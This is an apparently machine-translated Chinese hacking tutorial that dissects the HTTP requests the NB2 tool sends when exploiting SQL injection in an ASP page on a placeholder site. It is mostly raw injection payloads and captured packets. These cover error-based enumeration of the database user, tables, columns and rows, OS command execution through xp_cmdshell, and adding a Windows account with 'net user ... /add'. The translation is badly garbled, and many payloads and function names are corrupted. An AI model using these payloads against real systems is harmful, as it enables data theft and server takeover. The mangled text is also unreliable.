Author: Void from: www.9cbs.net SQL injection is very popular some time ago, used NB2 Kotake people may know, this tool nearly invincible, as they used it can also put a stop to the black for a few seconds, but do not understand The injection process can always be improved, it will never be successful ~~ First, I am just a rookie, just recently studying SQL, just putting the NB2 injection process, the tool WSE, I believe everyone will not be unfamiliar, There is a network everywhere, I will give an address, _blank> http://www.gxgl.com/soft/wse06b1.zip, this is a program used to monitor and modify the network to send and receive data, can be used to help you Debug web application. Less nonsense, start, first find a SQL injection vulnerability site _blank> www.testdb.net, find an injection point: _read.asp? Id = 80 "target = _blank> http: // www. Testdb.net/Article_read.asp?id=80 huh, _blank> www.testdb.net This URL is of course not existent.
Procedure, get the SQL Server database information to open the NB2, type the address: _read.asp? Id = 80 "target = _blank> http://www.testdb.net/article_read.asp?id=80, select" Get "mode, Click the "Detection" button to obtain the following information: Multi-sentence execution: unknown child query: Support current User: TEST User Permissions: DB_OWNER Current Library: TestDB TestB Take NB2 should be very familiar with the content ~~% 20 Explain that space% 2B is interpreted as number,% 25 interprets the% number HTTP / 1.1 200 OK // Return Success HTTP / 1.1 500 INTERNAL Server Error detects the GET package information with WSE, as follows: Get /Article_read.asp?id= 80 http / 1.1get /article_read.asp?id=80 and User+char (124 )=0 http / 1.1: article_read.asp? Id = 80 and user char (124) = 0 char (124) Character '|' get /article_read.asp?id=80; Declare @a INT - http / 1.1: Article_read.asp? Id = 80; declare @a int - // Decision Support multiple queries GET /ATICLE_READ.ASP ?ID=80 and (select count(1 ) From [sysobjects]) =0 http / 1.1accept: image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, * / * User-Agent: Microsoft URL Control - 6.00.8862Host: _blank> www.testdb.netConnection: Keep-AliveCache-Control: no-cacheCookie: articleid = 80% 3Bdeclare % 40a int% 2D% 2D Aspsessionidsstcttqd = Ellnneidceeanbmokamgjged: article_read.asp? Id = 80 and (Select Count (1) from [SYS Objects])> = 0 // Judgment whether the sub-query get /article_read.asp?id=80 AND User+char (124 )=0 http / 1.1accept: image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, * / * User-Agent: Microsoft URL Control - 6.00.8862Host: _blank> www.testdb.netConnection: Keep-AliveCache-Control: no-cacheCookie: articleid = 80 and % 28Select count% 281 % 29 from % 5BSYSObjects% 5D% 29% 3E% 3D0; aspsessionidsstcttqd = Ellnneidceeanbmokamgjged 即: Article_Read.asp? Id = 80 and user char (124) =
0 // Get the current user user is a built-in variable of SQL Server, which is the user name currently connected, and the type is nVarchar. Take a NVARCHAR comparison with INT 0, the system will try to turn nvarchar's value to int type. If the process will definitely go wrong, of course, the process of turns will definitely error, SQL Server's error prompt is: will NVARCHAR VAT "EAST_ASP" transitions the syntax error when the data type is an int, huh, huh, EAST_ASP is the value of the variable user, so that the power of the database is not scrapped. AND user> 0Get /article_read.asp?id=80 and cast(is_srvrolemember(0x730079007300610064006d0069006E00 ) AS varchar(1 )+char(124 )=1 http / 1.1accept: image / gif, image / x-xbitmap , image / jpeg, image / pjpeg, * / * User-Agent: Microsoft URL Control - 6.00.8862Host: _blank> www.testdb.netConnection: Keep-AliveCache-Control: no-cacheCookie: articleid = 80 and % 28Select count% 281% 29 from % 5Bsysobjects% 5D% 29% 3E% 3D0; ASPSESSIONIDSSTCTTQD = ELLNNEIDCEEANBMOKAMGJGED namely:? article_read.asp id = 80 And Cast (IS_SRVROLEMEMBER (0x730079007300610064006D0069006E00) as varchar (1)) char (124) = 1 Function Description: Is_srvroleMember indicates whether the current user login is a member of the specified server role. Syntax is_srvrolemember ('role' [, 'login']) parameter 'role' The name of the server role is checked. Role's data type is sysname. The Role valid value is: sysadmin, dbcreator, diskadmin, processadmin, serveadmin, etcpadmin, securityadmin 'login' will check the optional name of the login. Login's data type is sysname, the default value is NULL. If not specified, use the current user's login account.
select Cast (IS_SRVROLEMEMBER (0x730079007300610064006D0069006E00) as varchar (1)) char (124) result is "1 |" GET /article_read.asp?id=80 And Cast(IS_MEMBER(0x640062005F006F0077006E0065007200) as varchar(1)) % 2Bchar (124) = 1 http / 1.1accept: image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, * / * user-agent: Microsoft URL Control - 6.00.8862Host: _blank> www.testdb .netConnection: Keep-AliveCache-Control: no-cacheCookie: articleid = 80 and % 28Select count% 281% 29 from % 5Bsysobjects% 5D% 29% 3E% 3D0; ASPSESSIONIDSSTCTTQD = ELLNNEIDCEEANBMOKAMGJGED namely: article_read.asp id =? 80 and cast (is_member (0x640062005007200) As varchar (1)) char (124) = 1SELECT CAST (is_member (0x640062005f006f0077006e0065007200) AS varchar (1)) char (124) result is "1 |", and the result is returned Same, but pay attention to the long string in IS_MEMBER, what does it mean, I don't know what it means, 0x730079007300610064006D0069006E00 is transformed into "| o | @ e", this thought it was a "sysadmin" similar string, but it seems not , Forget, don't want, huh, huh, but I think, its role should be the right to get the current user, such as: db_ownerget /article_read.asp?id=80 and db_name( )+char (124 )=0 http / 1.1Accept: image / gif, image / x-xbitmap, image / jpe g, image / pjpeg, * / * User-Agent: Microsoft URL Control - 6.00.8862Host: _blank> www.testdb.netConnection: Keep-AliveCache-Control: no-cacheCookie: articleid = 80 and % 28Select count% 281 % 29 from % 5BSYSObjects% 5D% 29% 3E% 3D0; aspsessionidsstcttqd = Ellnneidceeanbmokamgjged = 80 and db_name () char (124) = 0 This sentence, see a DB_NAME () function, Don't say more, everyone should know, db_name () is another system variable, returning is the connected database name. At the time, the process of obtaining the SQL database information is calculated that the analysis is complete.
In addition: The post method is no longer analyzed in detail. You can look at it yourself. Below is the package captured when the Post method is, the specific is basically the same as the GET method, mainly to see the last line information. Among them, many techniques are also used: Id = 80% 20and% 20User% 2bchar (124) = 0ID = 80 '% 20and% 20User% 2bchar (124) = 0% 20And% 20' '=' ID = 80% 25 '% 20And% 20User% 2bchar (124) = 0% 20And% 20'% 25 '=' ID = 80% 20And% 201 = 1ID = 80% 20and% 201 = 2ID = 80 '% 20and% 201 = 1% 20and % 20 '' = 'ID = 80'% 20and% 201 = 2% 20And% 20 '' = 'ID = 80% 25'% 20And% 201 = 1% 20And% 20 '% 25' = 'ID = 80% 25 '% 20And% 201 = 2% 20And% 20'% 25 '=' // Process 2, guess the table name Top1get /article_read.asp?id=80 and (select top 1 cast(name % 20AS% 20Varchar (8000))% 20FROM (SELECT% 20top% 201% 20ID, NAME% 20FROM% 20 [testdb] .. [sysobjects]% 20where% 20 type = char (85)% 20ORDER% 20BY% 20ID)% 20t % 20ORDER% 20BY% 20ID% 20DESC)> 0 http / 1.1 is: article_read.asp? Id = 80 and (SELECT TOP 1 CAST (Name AS VARCHAR (8000)) from (SELECT TOP 1 ID, NAME FROM [TestDB]. [sysObjects] where xtype = char (85) ORDER BY ID) TORDER BY ID DESC)> 0 Char (85) = 'u' The role is to obtain the table name of the first table of the TESTDB database, and push TOP N, Other table names can be obtained.
Top2get /article_read.asp?id=80 and (select top 1 cast (Name AS varchar(8000) ] 0 ID ,NAME FROM [testdb] .. ASP? ID = 80% 20And% 20 (select% 20top% 201% 20cast (Name% 20AS% 20Varchar (8000))% 20FROM (SELECT% 20top% 201% 20ID, Name% 20From% 20 [TestDB] .. [SYSOBJECTS. ]% 20where% 20 type = char (85)% 20ORDER% 20BY% 20ID)% 20T% 20DER% 20BY% 20ID% 20DESC)> 0 http / 1.1accept: image / gif, image / x-xbitmap, image / jpeg, Image / pjpeg, * / * User-Agent: Microsoft URL Control - 6.00.8862Host: _blank> www.testdb.netConnection: Keep-AliveCache-Control: no-cacheCookie: ASPSESSIONIDSSTCTTQD = ELLNNEIDCEEANBMOKAMGJGED; articleid = 80 and % 28Select count% 281% 29 from % 5BSYSObjects% 5D% 29% 3E% 3D0 ........... // process three, according to a table name guess list name: ArticlesP?id/read.asp?id= 80% 20And% 20 (Select% 20top% 201% 20CAST (Name% 20S% 20Varchar (8000))% 20FROM% 20 (Select% 20top% 201% 20colid, Name% 20FROM% 20 [testdb] .. [syscolumn] % 20where% 20ID% 20 =% 20object_ID (NCHAR (101)% 2BNCHAR (97)% 2BNCHAR (115)% 2BNCHAR (116)% 2BNCHAR (104)% 2BNCHAR (111)% 2BNCHAR (116)% 2BNCHAR (46)% 2BNCHAR (46)% 2BNCHAR (65)% 2BNCHAR (82)% 2BNCHAR (84)% 2BNCHAR (73)% 2BNCHAR (67)% 2BNCHAR (76)% 2BNCHAR (69))% 20ORDER% 20BY% 20Colid)% 20t% 20ORDER% 20BY% 20Colid% 20DESC)> 0 http / 1.1: article_read.asp? Id = 80 and (select top 1 Cast) from (SELECT TOP 1 Colid, Name from [TestDB] .. [syscolumn] where id = Object_id (nchar (101) nchar (97) nchar (115) nchar (116) nchar (104) nchar (111) nchar (116) nchar (46) nchar ( 46) nchar (65) nchar (82) nchar (84) nchar (73) NCHAR (67)
Nchar (76) NCHAR (69)) Order By Colid DESC)> 0 The role is to obtain the column name of the first column of the Article table, and push TOP N, you can get other column names. Function Description: Object_ID Returns the database object identification number. Syntax Object_ID ('Object') Parameter 'Object' The object to use. Object's data type is char or Nchar. If the data type of Object is char, it is hidden to convert it to nchar.
Return Type INTNCHAR (101) Nchar (97) Nchar (115) Nchar (116) Nchar (104) Nchar (111) Nchar (116) Nchar (46) Nchar (46) Nchar (65 ) Nchar (82) nchar (84) nchar (73) nchar (67) nchar (76) nchar (69) corresponds to string testdb..Aticle is: article_read.asp? Id = 80 and (Select Top 1 Cast (Name As Varchar (8000)) from (Select Top 1 Colid, Name from [Testdb] .. [Syscolumns] where id = Object_id ('testdb..Aticle') Order by colid DESC)> 0top2get /article_read.asp?id /80 and (select top 1 cast (Name AS varchar(8000 ) From (select top 2 colid, name From % 20 [testdb] .. [Syscolumns]% 20where% 20ID% 20 =% 20Object_ID (nchar (101)% 2BNCHAR (97)% 2BNCHAR (115)% 2BNCHAR (116)% 2BNCHAR (104)% 2BNCHAR (111)% 2BNCHAR (116)% 2BNCHAR (46)% 2BNCHAR (46)% 2BNCHAR (65)% 2BNCHAR (82)% 2BNCHAR (84)% 2BNCHAR (73)% 2BNCHAR (67)% 2BNCHAR (76)% 2BNCHAR (69)) % 20ORDER% 20BY% 20Colid)% 20t% 20ORDER% 20BY% 20Colid% 20Desc)> 0 http / 1.1topn ... WSE captured package information: get /article_read.asp?id=80 and (select top % 201% 20CAST (Name% 20AS% 20VARCHAR (8000))% 20FROM% 20 (SELECT% 20top% 201% 20 Colid, Name% 20FROM% 20 [testdb] .. [Syscolumns]% 20where% 20ID% 20 =% 20object_ID (nchar (101)% 2BNCHAR (97)% 2BNCHAR (115)% 2BNCHAR (116)% 2BNCHAR (104)% 2BNCHAR (111)% 2BNCHAR (116)% 2BNCHAR (46)% 2BNCHAR (46)% 2BNCHAR (65)% 2BNCHAR (82)% 2BNCHAR (84)% 2BNCHAR (73)% 2BNCHAR (67)% 2BNCHAR (76)% 2BNCHAR (69))% 20RDER% 20BY% 20Colid)% 20t% 20RDER% 20BY% 20Colid% 20Desc)> 0 http / 1.1accept: image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, * / * User-Agent: Microsoft URL Control - 6.00.8862Host: _blank> www.testdb.netConnection: Keep-AliveCache-Control: no-cacheCookie: ASPSESSIONIDSSTCTTQD = ELLNNEIDCEEANBMOKAMGJGED; articleid = 80 and % 28Select count% 281% 29
From % 5BSYSObjects% 5D% 29% 3E% 3D0 ............... // process four, according to the list of content field name: Titletop1get /article_read.asp?id=80 % 20AND% 20 (Select% 20top% 201% 20ISNULL (CAST ([Title]% 20S% 20Varchar (8000)), char (32))% 2BCHAR (124)% 20FROM% 20 (SELECT% 20top% 201% 20 [ Title]% 20FROM% 20 [TestDb] .. [article]% 20where% 201 = 1% 20ORDER% 20BY% 20 [Title])% 20T% 20RDER% 20BY% 20 [Title]% 20Desc)> 0 http / 1.1 : Article_read.asp? Id = 80 and (Select Top 1 Isnull (Cast ([Title] AS VARCHAR (8000)), Char (32)) CHAR (124) from (SELECT TOP 1 [Title] from [TestDB]. [Article] where 1 = 1 Order by [title]) T order by [title] desc)> 0 The role is to obtain the value of the first row record of the title field, and push TOP N in this class, the value of other rows can be obtained.
TOP2GET /ATICLE_READ.ASP?id=80 And (select top 1 20ISNULL (Cast ([Title] AS varchar (8000)), CHAR (32 ) From (SELECT% 20top% 202% 20 [Title]% 20FROM% 20 [testdb] .. [article]% 20where% 201 = 1% 20RDER% 20BY% 20 [Title])% 20T% 20RDER% 20BY% 20 [Title] % 20DESC)> 0 HTTP / 1.1TOPN ... WSE captured package information: // Get the number of records of Article table get /article_read.asp?id=80 and (select cast(count(1 ) AS % 20Varchar (8000))% 2bchar (124)% 20FROM% 20 [TestDB] .. [Article]% 20where% 201 = 1)> 0 http / 1.1accept: image / gif, image / x-xbitmap, image / jpert , image / pjpeg, * / * User-Agent: Microsoft URL Control - 6.00.8862Host: _blank> www.testdb.netConnection: Keep-AliveCache-Control: no-cacheCookie: ASPSESSIONIDSSTCTTQD = ELLNNEIDCEEANBMOKAMGJGED; articleid = 80 and % 28Select Count% 281% 29 from % 5BSYSObjects% 5D% 29% 3E% 3D0 // get the first record content of the Title field of the articles table Get /Article_read.asp?id=80 and (select top 1 % 20Inull (CAST ([Title]% 20VARCHAR (8000)), CHAR (32))% 2bchar (124)% 20FROM% 20 (SELECT% 20top% 201% 20 [Title]% 20FROM% 20 [TestDB]. [Article]% 20where% 201 = 1% 20ORDER% 20BY% 20 [Title])% 20T% 20RDER% 20BY% 20 [Title]% 20Desc)> 0 http / 1.1accept: image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, * / * user-agent: Microsoft URL Control - 6.00.8862Host: _blank> www.testdb.netConnection: Keep-AliveCache-Control: no-cacheCookie: ASPSESSIONIDSSTCTTQD = ELLNNEIDCEEANBMOKAMGJGED; articleid = 80 and % 28Select count% 281% 29 from % 5Bsysobjects% 5D% 29% 3E% 3D0 ............... // Then, the analysis of the table name, field name and field content is basically over, and then look at other main functions.
Procedure 5. Execute the DOS command and execute the SQL statement to execute the DOS command DIR C: / return capture: get /art1_read.asp?id=80 and db_name()+char(124 )=0 http / 1.1accept: image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, * / * User-Agent: Microsoft URL Control - 6.00.8862Host: _blank> www.testdb.netConnection: Keep-AliveCache-Control: no-cacheCookie : ASPSESSIONIDSSTCTTQD = ELLNNEIDCEEANBMOKAMGJGED; articleid = 80 and % 28Select count% 281% 29 from % 5Bsysobjects% 5D% 29% 3E% 3D0GET /article_read.asp?id=80;EXEC MASTER..XP_CMDSHELL 'Dir% 20C: /% 20>% 20C: /NB_Commander_Txt.log '; DROP% 20TABLE% 20NB_Commander_Tmp; CREATE% 20TABLE% 20NB_Commander_Tmp (ResultTxt% 20varchar (7996)% 20NULL); BULK% 20INSERT% 20 [testdb] .. [NB_Commander_Tmp] % 20FROM% 20'c: /nb_commander_txt.log' With (KeepnUlls); ALTER% 20Table% 20NB_Commander_TMP% 20Add% 20ID% 20INT% 20NOT% 20NULL% 20IDENTITY% 20 (1, 1) - HTTP / 1.1ACCEPT : Image / GIF, Image / X-Xbitmap, Image / JPEG, Image / PJPEG, * / * User-Agent: Microsoft URL Control - 6.00.8862Host: _blank> www.testdb.netconnection: Keep-AliveCache-Control: No- Cachecookie: aspsessioni DSSTCTTQD = ELLNNEIDCEEANBMOKAMGJGED; articleid = 80 and % 28Select count% 281% 29 from % 5Bsysobjects% 5D% 29% 3E% 3D0 is mainly this:? Article_read.asp id = 80; EXEC MASTER..XP_CMDSHELL 'Dir C: /> C: /NB_Commander_Txt.log '; DROP TABLE NB_Commander_Tmp; CREATE TABLE NB_Commander_Tmp (ResultTxt varchar (7996) NULL); BULK INSERT [testdb] .. [NB_Commander_Tmp] FROM' C: /NB_Commander_Txt.log 'WITH (KEEPNULLS); ALTER TABLE NB_COMMANDER_TMP Add ID INT Not Null Identity% 20 (1, 1) - BULK INSER Copy a data file to the database table or view in the format specified by the user. KeepnUlls Specifies a null value in a large-capacity replication operation, rather than assigns the default value to the inserted column. For details, please check the T-SQL syntax, which is described in detail.
The function of the above statement is to save the result of the DOS command DIR C: / to a file nb_commander_txt.log, then write the contents of this file to the new temporary table NB_COMMANDER_TMP, and add a self-growth field ID, I believe everyone It is easy to understand. ID = 1get /article_read.asp?id=80 and (select top 1 case when Resulttxt 0020null Then '|' 20Then Resulttxt+'|'% 20nd% 20FROM% 20NB_COMMANDER_TMP% 20where% 20ID = 1) = 0 http / 1.1accept: image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, * / * user-agent: Microsoft URL Control - 6.00.8862HOST: _blank> www.testdb.netConnection: Keep-AliveCache-Control: no-cacheCookie: ASPSESSIONIDSSTCTTQD = ELLNNEIDCEEANBMOKAMGJGED; articleid = 80% 3BEXEC MASTER% 2E% 2EXP% 5FCMDSHELL % 27Dir C% 3A% 5C % 3E C% 3A% 5CNB% 5FCommander% 5FTxt% 2Elog% 27% 3BDROP TABLE NB% 5FCommander% 5FTmp% 3BCREATE TABLE NB% 5FCommander% 5FTmp% 28ResultTxt varchar% 287996% 29 NULL% 29% 3BBULK INSERT % 5Btestdb% 5D% 2E% 2E% 5BNB% 5Fcommander% 5FTMP% 5D FROM % 27C% 3A% 5CNB% 5FCommander% 5FTXT% 2ELOG% 27 $ % 28 Keepnulls% 29% 3Balter Table NB% 5FCommander% 5FTMP Add ID INT NOT NULL IDENTITY % 281% 2C1% 29% 2D% 2D ie: article_read.asp? Id = 80 and (SELECT TOP 1 Case When ResulttxtX Null Then '|' Else ResultTxt '|' end from nb_commander_tmp where id = 1 ) = 0 input A result, the following, TOPN inputs all echo results.
ID = 2get /article_read.asp?id=80 and (select top 1 case When Resulttxt 200null Then '|' 20Then Resulttxt+'|' 200%) 20FROM% 20NB_COMMANDER_TMP% 20where% 20ID = 2) = 0 http / 1.1accept: image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, * / * user-agent: Microsoft URL Control - 6.00.8862HOST: _blank> www.testdb.netConnection: Keep-AliveCache-Control: no-cacheCookie: ASPSESSIONIDSSTCTTQD = ELLNNEIDCEEANBMOKAMGJGED; articleid = 80% 3BEXEC MASTER% 2E% 2EXP% 5FCMDSHELL % 27Dir C% 3A% 5C % 3E C% 3A% 5CNB% 5FCommander% 5FTxt% 2Elog% 27% 3BDROP TABLE NB% 5FCommander% 5FTmp% 3BCREATE TABLE NB% 5FCommander% 5FTmp% 28ResultTxt varchar% 287996% 29 NULL% 29% 3BBULK INSERT % 5Btestdb% 5D% 2E% 2E% 5BNB% 5Fcommander% 5FTMP% 5D FROM % 27C% 3A% 5CNB% 5FCommander% 5FTXT% 2ELOG% 27 $ % 28 Keepnulls% 29% 3Balter Table NB% 5FCommander% 5FTMP Add ID INT NOT NULL IDENTITY % 281% 2C1% 29% 2D% 2DID = N ............... output display: [unexpected output] [unexpected output] [unexpected output] ] [Unexpected output] [unexpected output] [unexpected output] [unexpected output] [unexpected output] ......... If there is no problem, it will output all the files in C: / next, appear The above tips may be that the data table NB_COMMANDER_TMP has not created success, so it can't be correct Output.
Do not return to the captain analysis: DOS command DIR C: / GET /ARTICLE_READ.ASP ?ID=80 ;Exec master..dp_cmdshell 'dir c:/ '- http / 1.1accept: image / gif, Image / x-xbitmap, image / jpeg, image / pjpeg, * / * User-Agent: Microsoft URL Control - 6.00.8862Host: _blank> www.testdb.netConnection: Keep-AliveCache-Control: no-cacheCookie: ASPSESSIONIDSSTCTTQD = ELLNNEIDCEEANBMOKAMGJGED; ArticleID = 80% 3BDrop Table NB% 5Fcommander% 5FTMP% 3Bexec Master% 2E% 2EXP% 5FCMDSHELL % 27DEL C% 3A% 5CNB% 5FCommander% 5FTXT% 2D% 27% 2D% 2D: article_read.asp? id = 80; exec master "DIR C: / '- does not need to display output results. Output display: Command execution DOS command: Net user tsinternetUsers password / addget /article_read.asp?id=80 ;ec master..net User TSINTERNETUSERS Password /Add' - http / 1.1 Accept: image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, * / * user-agent: Microsoft URL Control - 6.00.8862Host: _BLANK> www.testdb.netconnection: Keep-AliveCache-Control: NO -cachecookie: aspsessionidsstcttqd = Ellnneidceeanbmokamgjged; ArticleID = 80% 3Bexec Master% 2E% 2EXP% 5FCMDSHELL % 27DIR C% 3A% 5C% 27% 2D% 2D Execute other DOS commands.
